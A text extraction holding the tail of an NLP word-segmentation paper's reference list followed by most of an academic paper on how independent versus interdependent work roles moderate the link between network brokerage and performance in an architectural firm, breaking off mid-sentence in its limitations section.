Adaptive subgradient methods for online learning and stochastic optimization. Journal of Machine Learning Research, 12(Jul):2121–2159. Xavier Glorot and Yoshua Bengio. 2010. Understanding the difficulty of training deep feedforward neural net- works. In International Conference on Artificial Intel- ligence and Statistics, pages 249–256. Yoav Goldberg and Michael Elhadad. 2013. Word seg- mentation, unknown-word resolution, and morpholog- ical agreement in a Hebrew parsing system. Computa- tional Linguistics, 39(1):121–160, March. Noemie Guthmann, Yuval Krymolowski, Adi Milea, and Yoad Winter. 2009. Automatic annotation of mor- phosyntactic dependencies in a modern Hebrew. In Proceedings of the 1st Workshop on Treebanks and Linguistic Theories, pages 1–12. Sepp Hochreiter and Jürgen Schmidhuber. 1997. Long short-term memory. Neural computation, 9(8):1735– 1780. Zhiheng Huang, Wei Xu, and Kai Yu. 2015. Bidi- rectional LSTM-CRF models for sequence tagging. arXiv preprint arXiv:1508.01991. Peter J Huber. 1964. Robust estimation of a location pa- rameter. The annals of mathematical statistics, pages 73–101. 434 Alon Itai and Shuly Wintner. 2008. Language resources for Hebrew. Language Resources and Evaluation, 42(1):75–98. John D. Lafferty, Andrew McCallum, and Fernando C. N. Pereira. 2001. Conditional random fields: Probabilis- tic models for segmenting and labeling sequence data. In Proceedings of the Eighteenth International Con- ference on Machine Learning, ICML ’01, pages 282– 289. Haizhou Li, A Kumaran, Vladimir Pervouchine, and Min Zhang. 2009. Report of NEWS 2009 machine translit- eration shared task. In Proceedings of the 2009 Named Entities Workshop: Shared Task on Transliteration, pages 1–18. Edward Loper and Steven Bird. 2002. NLTK: The nat- ural language toolkit. In Proceedings of the ACL-02 Workshop on Effective tools and methodologies for teaching natural language processing and computa- tional linguistics-Volume 1, pages 63–70. Association for Computational Linguistics. Will Monroe, Spence Green, and Christopher D Man- ning. 2014. Word segmentation of informal arabic with domain adaptation. In Proceedings of the 52nd Annual Meeting of the Association for Computational Linguistics (Volume 2: Short Papers), volume 2, pages 206–211. Amir More, Özlem Çetinoğlu, Çağrı Çöltekin, Nizar Habash, Benoı̂t Sagot, Djamé Seddah, Dima Taji, and Reut Tsarfaty. 2018. CoNLL-UL: Universal morpho- logical lattices for Universal Dependency parsing. In Proceedings of the Eleventh International Conference on Language Resources and Evaluation. Joakim Nivre, Marie-Catherine de Marneffe, Filip Ginter, Yoav Goldberg, Jan Hajic, Christopher D. Manning, Ryan McDonald, Slav Petrov, Sampo Pyysalo, Na- talia Silveira, Reut Tsarfaty, and Daniel Zeman. 2016. Universal dependencies v1: A multilingual treebank collection. In Proceedings of the 10th International Conference on Language Resources and Evaluation, pages 1659–1666. David Palmer and John Burger. 1997. Chinese word seg- mentation and information retrieval. In AAAI Spring Symposium on Cross-Language Text and Speech Re- trieval, pages 175–178. Teemu Ruokolainen, Oskar Kohonen, Sami Virpioja, and Mikko Kurimo. 2013. Supervised morphological seg- mentation in a low-resource learning setting using con- ditional random fields. In Proceedings of the Sev- enteenth Conference on Computational Natural Lan- guage Learning, pages 29–37, Sofia, Bulgaria. Asso- ciation for Computational Linguistics. Ivan A Sag, Timothy Baldwin, Francis Bond, Ann Copes- take, and Dan Flickinger. 2002. Multiword expres- sions: A pain in the neck for NLP. In International Conference on Intelligent Text Processing and Com- putational Linguistics, pages 1–15. Springer. Yan Shao, Christian Hardmeier, Jörg Tiedemann, and Joakim Nivre. 2017. Character-based joint segmenta- tion and POS tagging for Chinese using bidirectional RNN-CRF. In Proceedings the 8th International Joint Conference on Natural Language Processing, pages 173–183. Nitish Srivastava, Geoffrey E Hinton, Alex Krizhevsky, Ilya Sutskever, and Ruslan Salakhutdinov. 2014. Dropout: a simple way to prevent neural networks from overfitting. Journal of Machine Learning Re- search, 15(1):1929–1958. Milan Straka and Jana Straková. 2017. Tokenizing, POS tagging, lemmatizing and parsing UD 2.0 with UD- Pipe. In Proceedings of the CoNLL 2017 Shared Task: Multilingual Parsing from Raw Text to Universal De- pendencies, pages 88–99. Nianwen Xue. 2003. Chinese word segmentation as character tagging. Computational Linguistics and Chinese Language Processing, pages 29–48. Daniel Zeman, Martin Popel, Milan Straka, Jan Ha- jic, Joakim Nivre, Filip Ginter, Juhani Luotolahti, Sampo Pyysalo, Slav Petrov, Martin Potthast, Fran- cis Tyers, Elena Badmaeva, Memduh Gokirmak, Anna Nedoluzhko, Silvie Cinkova, Jan Hajic jr., Jaroslava Hlavacova, Václava Kettnerová, Zdenka Uresova, Jenna Kanerva, Stina Ojala, Anna Missilä, Christopher D. Manning, Sebastian Schuster, Siva Reddy, Dima Taji, Nizar Habash, Herman Leung, Marie-Catherine de Marneffe, Manuela Sanguinetti, Maria Simi, Hiroshi Kanayama, Valeria dePaiva, Kira Droganova, Héctor Martı́nez Alonso, Çağr Çöltekin, Umut Sulubacak, Hans Uszkoreit, Vivien Macketanz, Aljoscha Burchardt, Kim Harris, Katrin Marheinecke, Georg Rehm, Tolga Kayadelen, Mohammed Attia, Ali Elkahky, Zhuoran Yu, Emily Pitler, Saran Lertpradit, Michael Mandl, Jesse Kirchner, Hector Fernandez Al- calde, Jana Strnadová, Esha Banerjee, Ruli Manurung, Antonio Stella, Atsuko Shimada, Sookyoung Kwak, Gustavo Mendonca, Tatiana Lando, Rattima Nitisaroj, and Josie Li. 2017. CoNLL 2017 shared task: Multi- lingual parsing from raw text to Universal Dependen- cies. In Proceedings of the CoNLL 2017 Shared Task: Multilingual Parsing from Raw Text to Universal De- pendencies, pages 1–19. Hai Zhao, Chang-Ning Huang, Mu Li, and Bao-Liang Lu. 2006. Effective tag set selection in Chinese word segmentation via conditional random field modeling. In Proceedings of the 20th Pacific Asia Conference on Language, Information and Computation, pages 87– 94. Youguang Zhou. 1991. The family of Chinese character- type scripts. Sino-Platonic Papers, 28. 435 436 work_2vd5wfkfpfgqtm4e6elvfcktem ---- 47© 2020 Authors. This work is licensed under the Creative Commons Attribution 4.0 License (https://creativecommons.org/licenses/by/4.0/). CONNECTIONS Issue 1 | Vol. 40Article | DOI: 10.21307/connections-2019.012 The contingent effect of work roles on brokerage in professional organizations Anssi Smedlund1,* and Emily W. Choi2 1Finnish Institute of Occupational Health, Helsinki, Uusimaa. 2Naveen Jindal School of Management, The University of Texas at Dallas, Texas, TX. *E-mail: anssi.smedlund@ttl.fi Abstract In this paper, we consider whether brokerage in an intra- organizational communication network and type of work role interact to predict individual performance in a professional organization. The independent–interdependent nature of work roles is considered a key factor in structural contingency theory, but is yet to be studied in relation to brokerage. We propose that a brokerage position has a joint effect on performance along with work role in a study of organization-wide communication network in an architectural firm with 65 employees. Our analysis suggests an association between brokerage and role-prescribed performance for individuals in both interdependent and independent types of work roles. Our findings also suggest that interdependent roles requiring broad, organization- wide collaboration, and communication with others, brokerage is positively associated with the performance prescribed by the role, but for independent roles, wherein collaboration and communication are somewhat limited by the formal role, brokerage has far less of an effect. Our findings contribute to brokerage theory by comparing how brokerage affects performance in two distinct work roles by illustrating how the benefits of brokerage seem more restricted to those in interdependent work roles. The contribution of this paper is to suggest the independent–interdependent nature of work role as a boundary condition for brokerage. Keywords Network theory, Brokerage, Formal organization, Informal organization, Work role, Interdependency Brokerage theory is probably one of the most influential lines of thought in network theory. Since Burt’s (1992) seminal book, brokerage has been studied and associated with numerous organizational advantages for an individual, such as higher salary and faster promotion, based on the benefits of having better access to information and greater control over other actors than their more socially constrained colleagues (Burt, 2004). While brokerage generally provides benefits, some studies have found that under context-specific conditions, there may not always be positive effects (e.g. Barnes et al., 2016; Burt, 1998; Fleming et al., 2007). Therefore, as the empirical results are mixed, the contingencies and boundary conditions for brokerage merit further research. An important, but generally overlooked boundary condition in structural network analysis is the independ- ent–interdependent nature of work roles, even though interdependency has been widely used as a modera- tor in general management studies and is at the core of structural contingency theory (Thompson, 1967). Inter- dependence regulates how much ind ividuals can com- municate and collaborate with others to perform their work effectively (Cummings, 1978; Wang et al., 2019), and is one of the most important factors influencing team performance in organizations (Langfred, 2005; 48 The contingent effect of work roles on brokerage in professional organizations Saavedra et al., 1993). In structural contingency the- ory, numerous dimensions of interdependence, such as pooled, sequential, or reciprocal types, have been distinguished based on exchange of information or re- sources (Thompson, 1967). This empirical study considered how the benefits of brokerage are contingent on the independent– interdependent nature of the work role. That is, how the informal organization, operationalized as the intra- organizational communication network structure, corresponds with the formal work role for performance. The novelty and value in this approach is that when the formal and informal organizations have been linked to performance outcomes as such, their effects on each other have not been linked so often in the literature (McEvily et al., 2014). Following the structural contingency theory logic to test the formal work role’s effect as a boundary condition for brokerage, our paper explores whether work role moderates brokerage effect on performance in professional organizations. Drawing from the nature of work at our case architectural firm, our hypothesis is developed on the starting point that work in a professional organization is generally anchored on either independent or interde- pendent tasks and work roles are formed accordingly. Both independent and interdependent roles prompt role-prescribed performance expectations due to the division of labor: professionals typically work in inte- llectually demanding projects, requiring them to focus their energy on the highly demanding ope rative work, simultaneously creating demand for interdependent roles to manage the projects and the supporting organizations (cf. Etzioni, 1964; Weber, 1982). Thus, the formal work role not only limits interdependence for the professionals, but also assumes managers to adopt the interdependent role to communicate and collaborate broadly across the organization. In this paper, we hypothesize that when brokerage and role-prescribed performance are aligned, individuals perform best. Our data are derived from a communication network study of an architectural firm of 93 employees, of which 65 were classified as working mainly in either independent (n = 31) or interdependent (n = 34) roles. We chose to study this specific architectural firm as a typical professional organization because the firm had clearly distinguished work roles for the independent professional architects and interdependent managers1. In our analysis, we examined the moderating effect of work role in the association between brokerage and role-specific individual performance. Role-specific performance involved an objective measure of either billable hours for the professional architects (i.e. independent work role) or a peer evaluation score of managers as promoter of ideas (i.e. interdependent work role). Our study contributes to the underlying assump- tions about the effects of brokerage. Despite a few negative reports from the literature (e.g. Barnes et al., 2016; Fleming et al., 2007), the general understanding about brokerage is that it benefits the individual in most circumstances. In this regard, our study contributes to brokerage theory by pointing out an important contingency of work role. In practical terms, our findings imply that independent professionals, such as architects, do not seem to benefit so much from networking and bridge building, since these are less related to their role-prescribed performance. In the context of management theory, our study contributes to a better understanding of the interplay of formal and informal organizations. These two topics have historically remained separate and unconnected (McEvily et al., 2014) but have spurred number of integrative studies (Biancani et al., 2014; Kleinbaum et al., 2013; Soda and Zaheer, 2012; Srivastava, 2015). By treating work role as a moderator in molding the association between brokerage and performance, we address the gap in the literature on the topic by extending structural network analysis with contingencies (Adler and Kwon, 2002; Carnabuci and Oszegi, 2015; Cross and Cummings, 2004; Hansen, 1999; Mehra et al., 2001). By doing this, we increase the explanatory power of structural analysis (Lincoln, 1990; cf. Lincoln and Miller, 1979), resulting as an increased knowledge of how informal network position is associated with role- prescribed performance. Contingent effect of work role on the relationship between brokerage and performance The basic tenet of our study is that there are, on the whole, fundamental differences in the communication and cooperation requirements between independent and interdependent work roles. According to classi- cal management theory, work roles outline a kind of bureaucratic boundary for social relationships that individuals can and should adhere to and engage in within their organization – when an individual is assigned a certain role, then the communication network becomes somewhat inherited and defined 1The organization’s work role structures and innovation ac- tivities were studied extensively at two-year research project with 13 theme-based interviews and several workshops. The results are reported at a PhD thesis (Tuominen, 2013). 49 CONNECTIONS by the role (Hansen and Haas, 2001; Lincoln and Miller, 1979; McEvily et al., 2014; Merton, 1939; Weber, 1982). Over time, individuals develop informal networks largely corresponding the role-prescribed relationships (Lincoln and Miller, 1979; Padgett and Ansell, 1993), but the networks reach beyond the formal bureaucratic boundaries as individuals communicate freely across the organization (Krackhardt, 1994). In addition to communication, formal division of labor and corresponding roles also affect expected performance. Previous research has noted that a work role defines what types of activities an individual performs, prompts normative expectations in an organization, and sets the standard for how performance is evaluated (Biddle, 1986; Katz and Kahn, 1978; Welbourne et al., 1998). In the most extreme cases, performance that is not prescribed by the work role is prohibited and only the type of performance established for the role is rewarded (Pfeffer and Salancik, 1975). Conceivably because performance expectations are strongly determined by the work role, a notable body of research studies specifically considers work role performance, and the conditions to manage and maximize it (Griffin et al., 2007; Leroy et al., 2015). Work roles having a contingent effect on the relationship between brokerage and performance can be analyzed using structural contingency theory combined with the conception of organization as a socio-technical system. As a socio-technical system, professional organization is a combination of social, interpersonal communication networks, and technical roles specified by the formal division of labor, wherein the formal aspects interact with the social aspects of performance (Cummings, 1978). From this perspective, work role is derived from technology and corresponds with Thompson’s (1967) pooled task interdependence for independent work and reciprocal task interdependence for interdependent work. In the former category, rules and standard procedures provide enough coordination for the individuals and teams to work independently toward a common goal, and in the latter category, the coordination mechanism involves a mutual adjustment, as the work is performed together to produce the output. Specifically, the independent– interdependent nature of work has been a key focus of research related to team performance (Cummings, 1978; Langfred, 2005; Wang et al., 2019). In these studies, interdependence is built-in to the work the team performs, and then treated as a moderator of aspects such as group autonomy, collective efficacy, group potency, organizational citizenship or diversity for several different types of outcomes (Bachrach et al., 2006; Langfred, 2000, 2005; Stajkovic et al., 2009; Wang et al., 2019). Notable in the results of these studies is the support for the mechanisms derived from Thompson’s (1967) theory that demonstrate that the need for communication and cooperation increases along with an increase in the task interdependency, complexity of goals and feedback (Saavedra et al., 1993). In professional organizations, these dimensions become increasingly complex amid higher positions in formal hierarchy simply because managers tend to have increasingly broader job descriptions than their subordinates and participate in a larger number of overlapping projects of various kinds. Typically, managers are experienced professionals in their field, and they perform some of the client project work in addition to fulfilling the expectations toward sales, organizational development and coordinating activities in their departments or other work units (e.g. Etzioni, 1964). A manager’s goals are in this respect defined from both above and below their hierarchical position, and they receive feedback for their work from several others aside from their immediate colleagues. In contrast, professionals are technical specialists, and performing their job well generally requires spending more time at their desks working on specific projects, thus having inherently higher independence incorporated in their work roles, even if their project may require combining several individual’s work. Table 1 summarizes how professionals and managers differ in terms of interdependency based on the dimensions identified by Saavedra et al. (1993). A brokerage position in a communication network of interdependent work roles can provide a major boost to effective communication and cooperation. Studies show that brokerage provides the best position to coordinate work across other areas of a work communication network (Burt, 1992; Granovetter, 1973) and increases the ability to convey ideas across the organization to the distant individuals in the network (Reagans and McEvily, 2003). Brokerage also increases the chances that an individual’s activities are to be considered and engaged by others, and concomitantly, to be judged valuable (Burt, 2004). In general, brokerage means less structural constraint, more diversity, and weaker ties (Aral and Van Alstyne, 2011), and allows individuals to benefit from non-redundant sources of knowledge (Hansen, 1999). The more interdependent the work role is, the greater the need for brokerage in a professional organization. Our hypothesis evaluates how brokerage in the communication network and 50 The contingent effect of work roles on brokerage in professional organizations independent–interdependent work roles interact with each other: H1. Work role moderates the relationship between brokerage and role-prescribed performance such that the contribution of brokerage is stronger when the work role is interdependent compared to independent. Methods Data We tested our hypotheses using data collected in an architectural firm during a two-year study. We collected questionnaire and timesheet data from employees who participated in client projects residing in the same open office and who were employed during the first and second years of the study (n = 65). To control for common method variance and develop a causal argument on the network positions and performance, the data on dependent variables were collected in the second year of the study from time sheets and from an additional online survey. In total, there were 93 employees at the start of the study and the remaining 28 employees worked at other physical locations, left the company or belonged to administrative staff (e.g. information system administration and payroll). There were five formal roles: professionals, project managers, senior project managers, and managing partners. The professional architects were coded as independent roles (n = 31) and all manager roles were coded as interdependent roles (n = 34). The professionals performed different aspects of design and drawings, and managers attended to sales, project management, and development. Based on 13 interviews about work roles and innovative activities at the case company reported by Tuominen (2013), the professionals were clearly a distinct group from the managers and were allowed to focus mainly on their solitary architectural design work. Conversely, managers were given broad responsibilities in managing work units and engaged in development and innovation. The case firm invested heavily in innovation and development and just before the beginning of our data collection, promoted several individuals previously working as professional architects to project managers. Both work roles required talent and extensive training in architectural design, but they differed in communication patterns, the managers have to communicate across the firm to participate in and supervise several development projects. A total of 33% of the sample were women, and 83% had a master’s degree in architecture, which Table 1. Differences between independent and interdependent work roles in a professional organization. Independent roles in a professional organization Interdependent roles in a professional organization Typical formal role Professional Manager Task interdependency Client projects of several sequential and parallel tasks to be worked on alone and coordinated within the project team Supervision over work units, selling, negotiating, and participating in several client projects. Member of business development and strategy development teams Goal interdependency Client project provides clear goals for each individual and for compiled output of project Several goals coming from projects, firm, and clients Feedback interdependency Individuals receive feedback from colleagues working on the same project. Collective feedback provided by superior and client during and after project Feedback from the subordinates, from clients and from top management. Feedback from several projects Requirements for collaboration and coordination Lower Higher 51 CONNECTIONS is minimal required training for certified architects. The remaining 17% had a bachelor’s degree or vocational degree in related design field. The average tenure was 9.25 years (SD = 6.83) for managers and 5.17 years (SD = 4.89) for professionals. Measures Dependent variables We used billable hours from clients as a dependent variable of the role-prescribed performance for the independent work roles. This was constructed based on time sheets, where the employees had allocated their working time in a variety of categories. We chose billable hours from the client category as a performance measure of independent work roles, because the firm aimed at maximizing it, and it was directly linked to annual profit. We calculated a monthly mean of the number of billable hours to generate a uniform variable to describe individuals’ average performance through the year. Monthly mean billable hours for interdependent roles were 94.76 (SD = 38.04) and for independent roles 114.16 (SD = 22.27). The variable was normalized with second power transformation to adjust its skew. For the variable describing role-prescribed performance for interdependent work roles, we chose promoting of new ideas. Following the survey examples from Wasserman and Faust (1994), the variable was constructed from a questionnaire in which the respondent was asked to name five individuals in the firm who promote new ideas. Each nomination received one point, and points were summed resulting in a count variable of interdependent work roles’ performance. This procedure was chosen, because it provides a single component measure of a person’s perceived competence and ability to put forth actions in the organization that will eventually lead to innovation (March, 1991). This measure also corresponds with the current understanding of creativity that highlights the generation of both novel and useful ideas (Amabile, 1996) and provides a measure to identify those individuals who are both coming up with ideas and promoting them. The variable was normalized with square root transformation to adjust its skew. Independent variables The network data consisted of information on self-reported social ties in three types of work- related communication collected through an online sociometric survey instrument in the first year of study. Preliminary interviews consistently identified three types of informal, work-related interaction among employees that we distinguished in our survey: communication about the (i) day-to-day architectural design work, (ii) innovative new ideas, and (iii) business development. The network data were obtained from a free-choice survey with two-way directed questions, wherein giving-information-to and getting-information- from components of communication were asked separately (Wasserman and Faust, 1994). Thus, three network survey question pairs were used: one for communication about the day-to-day architectural design work, one for innovative new ideas, and one for business development. The wording of the questions were tailored to reflect the conditions of the company based on the interviews, and were checked with one of the supervisors before publishing the survey online. A one-sentence example was given in all three types of communication. Communication about the day-to- day architectural design work was defined as relating to the output delivered to clients that was recurring and was in the realm of respondent’s line of expertise. Communication for innovative new ideas was defined as work-related ideas that the respondent was not aware of anyone else proposing previously. Business development communication was defined as com- munication about improvements in pre-existing products or services, or internal company process or personal work practices. The response rate was 90% for the questions about communication in day-to-day architectural design work and business development tasks and 84% in communicating innovative new ideas. In the online survey, the network questions were presented after a filtering question wherein the employees had defined their own acquaintances from a roster of all employee names. Small organization size permitted a full roster method, which rules out recall bias thus increasing reliability of the network measures (Marsden, 2011). Separating giving-and-getting components of communication further increases psychometric reliability by allowing confirmation of each social tie (Krackhardt, 1990). The frequency scale in communication was set to choices of (4) daily, (3) weekly, (2) once a month, (1) less than once a month, or (0) = not at all. We transposed the getting-information-from component in each of network question pairs, and joined the resulting two networks together, by using the value of the giving-information component as communication frequency resulting in confirmed communication ties between individuals. Before generating the brokerage measures, we combined 52 The contingent effect of work roles on brokerage in professional organizations the three networks by summing up the frequencies, then dichotomizing at the mean frequency (MIN = 1, MAX = 12, MEAN = 3.411, SD = 2.47). Brokerage Our first brokerage measure was the additive inverse of Burt’s constraint (Burt, 1992). First, we generated Burt’s constraint with Ucinet VI structural holes routine limiting the measure to consider only an individual’s contacts’ ties and using both outgoing and incoming ties. Then we generated our brokerage measure by calculating 1 minus constraint, following recent network studies (Carnabuci and Oszegi, 2015; Soda et al., 2019). Thus, the higher the resulting brokerage measure is, the more brokering opportunities the individual has. In other words, our measure indicates how an individual’s communication is concentrated in non-redundant contacts in groups of connected colleagues, because the less constrained actors are connected to more groups of others (Burt, 1992). In our analysis, the higher the additive inverse of Burt’s constraint, the better opportunities for brokerage the individual has. As the second brokerage measure, we used Betweenness centrality (Freeman, 1977) generated with Stata function “nwcommands”. We added Betweenness centrality to the measures, because it has been frequently used as an additional brokerage measure (e.g. Fang et al., 2015). Independent work role We created a dummy variable to distinguish between independent and interdependent roles. All individuals in any of the manager roles (n = 34) were coded as interdependent (0) and all individuals in professional architect roles (n = 31) were coded as independent (1). Control variables We requested that the human resource manager of the company to provide us with demographic data of the employees. From that data, we created the control variables for organizational tenure, gender, and education to be used in our models because they were found to be significant in earlier studies of network positions and various outcome variables (Reagans and McEvily, 2003; Reagans and Zuckerman, 2001). Language skills and age were also considered in evaluating the modeling strategy, but these variables did not increase the explanatory power of the models and were dropped. Individuals were very homogeneous in terms of language skills, and age was highly correlated with tenure. There were six divisions in the firm specializing in certain types of architectural projects, for example, office buildings or shopping malls. We checked for an intraclass correlation (ICC) between the units to determine whether unit affiliation is a considerable source of variance in performance and did not find justification for hierarchical models. Results Table 2 presents bivariate correlations and descriptive statistics of the variables. Dependent variables and work role are numbered 1 to 3, followed by control variables and brokerage measures. We found Table 2. Means, standard deviations, and correlations. Variable Mean SD 1 2 3 4 5 6 7 1 Billable hours 103.88 32.89 2 Promoting new ideas 4.18 6.15 −0.56** 3 Independent work role 0.47 0.5 0.30* −0.41** 4 Tenure 7.37 6.31 −0.07 0.16 −0.32** 5 Female 0.33 0.48 0.13 −0.18 0.11 −0.13 6 Master’s degree 0.83 0.38 −0.06 0.2 −0.39** 0.08 −0.20 7 Inverse of Burt’s constraint 0.06 0.06 −0.19 0.41** −0.35** 0.25* −0.41** 0.06 8 Betweenness centrality 77.29 89.72 −0.32** 0.77** −0.27* 0.12 −0.25* 0.11 0.6** Notes: *p < 0.05; **p < 0.01. 53 CONNECTIONS a positive correlation between both brokerage measures and idea promotion. The number of billable hours negative correlation is significant with betweenness centrality, but not with the inverse of Burt’s constraint. The independent role (i.e. 1 = independent, 0 = interdependent) correlates positively with the number of billable hours and negatively with idea promotion, which supports the assumption of distinct output expectations between the work roles. Having a master’s degree and tenure correlate negatively with independent work role, indicating that those in interdependent work roles have higher education and higher tenure than independent roles. Both brokerage measures are positively intercorrelated as expected. We z-standardized all independent variables to facilitate better interpretation of the moderation effect as suggested by Dawson (2014). Tables 3 and 4 present the results of the regression analyses testing the association between the inverse of Burt’s constraint, betweenness centrality, promoting new ideas, and billable hours. As postestimation of the models showed heteroscedasticity of the residuals caused by slight non-normality of the transformed dependent variables, we used robust standard errors to control for this, as suggested by Antonakis and Dietz (2011). OLS regression was chosen because it has been considered a valid modeling strategy when network measures are included as independent variables (e.g. Reagans and McEvily, 2003; Srivastava, 2015). However, the network measures violate the independence of observations, which is one of the key assumptions of OLS regression resulting as underestimating of standard errors and over-rejecting of hypotheses (Srivastava, 2015). To correct this, we chose a procedure suggested by Borgatti et al. (2018) and compared the results of our conventional OLS models with those obtained from Ucinet VI node- level regression, which uses the OLS regression to generate the coefficients, but permutation technique for the p-values. As both modeling techniques are presented side by side in Tables 3 and 4, it can be observed that the permutation technique generally results in higher t-values for those coefficients that are statistically significant, providing additional support for our results. Our hypothesis about the work role’s boundary effect on brokerage means that brokerage is associated with higher work role-prescribed per- formance, if the role is interdependent. In other words, as employees in interdependent work roles are expected to engage in promoting new ideas in the organization, they benefit from brokerage. To test this aspect of the hypothesis, we first examined the Table 3. Results of conventional and node-level OLS regression analysis for promoting new ideas (t-values in parentheses). Promoting new ideas Model 1 conventional OLS Model 2 permutation OLS Model 3 conventional OLS Model 4 permutation OLS Independent work role −0.54 (−1.62) −0.54 (−1.79) −0.82 (−3.08)** −0.82 (−3.25)** Tenure 0.06 (0.45) 0.06 (0.50) 0.10 (0.79) 0.10 (0.91) Female 0.34 (1.57) 0.34 (1.17) 0.22 (1.20) 0.22 (0.92) Master’s degree 0.15 (0.60) 0.15 (0.41) 0.11 (0.52) 0.11 (0.35) Inverse of Burt’s constraint 2.10 (3.47)** 2.10 (4.97)** Independent × Inv. of Burt’s constraint −1.78 (−2.81)** −1.78 (−3.76)** Betweenness centrality 0.86 (5.92)** 0.86 (7.22)** Independent × Betweenness −0.33 (−1.25) −0.33 (−1.12) Constant 1.20 (3.09)** 1.20 (na) 1.65 (5.80)** 1.65 (na) R2 0.48 0.48 0.62 0.62 n 65 65 65 65 Note: **p < 0.01. 54 The contingent effect of work roles on brokerage in professional organizations Table 4. Results of OLS and node-level regression analysis for billable hours (t-values in parentheses). Billable hours Model 5 conventional OLS Model 6 permutation OLS Model 7 conventional OLS Model 8 permutation OLS Independent work role 0.43 (1.48) 0.43 (1.44) 0.62 (2.07)* 0.62 (2.07)* Tenure 0.10 (0.69) 0.10 (0.72) 0.09 (0.65) 0.09 (0.73) Female 0.09 (0.37) 0.09 (0.34) 0.10 (0.41) 0.10 (0.46) Master’s degree 0.31 (1.05) 0.31 (0.89) 0.29 (0.92) 0.29 (0.80) Inverse of Burt’s constraint −0.91 (−2.55)* −0.91 (−2.20)* Independent × Inv. of Burt’s constraint 1.21 (3.06)** 1.21 (2.60)* Betweenness centrality −0.25 (−1.67) −0.25 (−1.83) Independent × Betweenness 0.32 (1.12) 0.32 (0.94) Constant −0.34 (−0.86) −0.34 (na) −0.53 (−1.32) −0.53 (na) R2 0.18 0.18 0.14 0.14 n 65 65 65 65 Notes: *p < 0.05; **p < 0.01. main effects of the inverse of Burt’s constraint and betweenness centrality and then their interactions with independent versus interdependent work role. According to the main effects of the brokerage measures in Models 1 to 4 in Table 3, brokerage is associated with higher scores for promoting new ideas. When examining the significant interaction effect of the work role in the Models 1 and 2 in Table 3, it is evident that employees in interdependent roles benefit from brokerage more than those in independent roles for promoting new ideas. For example in Models 1 and 2, the positive effect of the inverse of Burt’s constraint for interdependent work roles is 2.10 and for independent work roles, the effect is 2.08 −1.78 = 0.30. Further, according to our hypothesis, for inde- pendent work roles, brokerage should have less effect on role-prescribed performance than for interdependent roles. In Table 4, brokerage is modeled with billable hours, which is the role-prescribed performance measure for independent work roles. The main effects of Models 5 and 6 in Table 4 indicate that brokerage is negatively associated with billable hours. The interaction effect of the work role in Model 5 shows that the negative effect of the inverse of Burt’s constraint for interdependent work roles is −0.91 and for independent work roles, the effect is −0.90−1.21 = −2.11. This shows that higher brokerage is associated with lower role-prescribed performance for independent roles. According to the main effects of the models presented in Tables 3 and 4, brokerage seems to be associated with higher performance in idea promotion and lower performance in billable hours, despite work role. However, in order to distinguish the work role-specific effects, further examination is needed. For this purpose, we examined the interactions by studying the simple slopes, which is a procedure in probing the interaction patterns (Dawson, 2014). After generating the significances of the simple slopes for interactions of the models with the inverse of Burt’s constraint and betweenness centrality for both promoting new ideas and billable hours (Models 1, 3, 5, and 7 in Tables 3 and 4) with Stata’s “margins” procedure (Table A1), we confirmed the hypothesis. For promoting new ideas, the coefficients of the simple slopes were statistically significant and positive for interdependent roles with both brokerage measures. Betweenness centrality was positive and significant also for independent roles, suggesting that brokerage is also associated with independent professionals in promoting their ideas. This was the case for the independent professionals in our study 55 CONNECTIONS who were not expected to promote new ideas, which was evident because 12 professionals out of 31 received zero nominations as promoters of new ideas. Notably, for interdependent roles, brokerage is associated with lower number of billable hours. Discussion Our study adds knowledge on the relation of brokerage to performance and improves the empirical understanding of how formal organization is related to the informal. In our case organization, our finding is that brokerage is associated with higher role- prescribed performance for those in interdependent roles, but not for those in independent roles. Therefore, our findings show that work role is a contingency, a boundary condition for brokerage. As brokers are bridging structurally distinct groups (Adler and Kwon, 2000; Burt, 1992, 1997; Reagans and McEvily, 2008), brokerage correlates with managerial performance in our empirical setting but does not have an association with independent professional’s performance measured with the amount of billable hours. Theoretical contributions By presenting work role as a boundary condition for brokerage, this paper makes several contributions to theory. First, the study complements earlier studies on the interplay of formal and informal organization (Biancani et al., 2014; Kleinbaum et al., 2013; Soda and Zaheer, 2012; Srivastava, 2015). Our results show that formal and informal structures reinforce each other, as proposed by McEvily et al. (2014) as one interaction mechanism between the formal and informal structures. Second, the study complements the contingency perspective on network theory. The network theory’s structuralist argument suggests a direct causal link from brokerage to performance (e.g. Emirbayer and Goodwin, 1994; Mayhew, 1980), traditionally giving less attention to contingencies. This has probably led to underrepresentation of network studies taking moderators such as work roles into account, only with few exceptions (Ahuja et al., 2003; Brass, 1981; Burt, 1998; Ibarra and Andrews, 1993), and only quite recently, the individual attributes as contingencies have been consistently included in network studies (Landis, 2016). Therefore, this study contributes to most brokerage literature that seems to imply that brokerage position benefits the broker, and sometimes but not always the network, all the time under all circumstances. Our study provides empirical evidence that suggests that it is in the role of managers to broker relations and communication among the horizontally and vertically differentiated units and employees for which they have responsibility. Our study suggests that formal work role not only greatly influences the performance targets, but also limits the advantage of brokerage to the behavior prescribed by the work role only for interdependent work roles. The strength of our study is in its organization- wide approach. We obtained network data from the entire population of employees in the firm with a particularly detailed survey questionnaire backed up with qualitative interviews. We separately surveyed giving-and-getting types of informal work-related communication ties enabling improved accuracy in examining brokerage. This so-called whole-network approach increases the validity of the brokerage measures used in the models (Borgatti et al., 2018). The second strength of our study is that it measured the role-prescribed performance with objective performance data: independent work role’s performance with billable hours from the time sheets and interdependent role’s performance with peer evaluations of idea promotion. By doing so, we complement the studies that have connected organization-wide networks and work performance (Brass, 1981; Carboni and Ehrlich, 2013; Cross and Cummings, 2004; Mehra et al., 2001; Sparrowe et al., 2001). Limitations and future research Despite its contributions, this study has several limitations providing motivation for further research. The first one concerns the case study character of our study. Our data were gathered from one firm, which limits the generalizability of the results. Yet, we were able to collect detailed survey, timesheet, and demographic data about the individuals working in the firm, resulting in organization-wide, bounded network data with the dependent variables that were meaningful proxies for performance. Confirming with the interviews and reviewing the self-reported job descriptions of professionals and supervisors, we concluded that the architect office seems like so many professional organizations, where work requires both high talent and extensive training, and where managers have professional backgrounds. The architects are regulated by a national regulatory agency with certification exams, and most of the individuals we studied were certified architects, thus the professional’s work in the firm was similar compared to firms in the same industry. The firm was well established in its market, and the employee 56 The contingent effect of work roles on brokerage in professional organizations turnover was relatively low providing prerequisites for established communication network structures and divisions of labor between the work roles. The second limitation is the reverse causality caused by common method variance, which is the usual limitation discussed in survey-based network studies (e.g. Carboni and Ehrlich, 2013; Sparrowe et al., 2001). We addressed common method variance by constructing our network variables from the first year of study and used the dependent variables from the second year. According to the assumptions of the structuralist approach of network 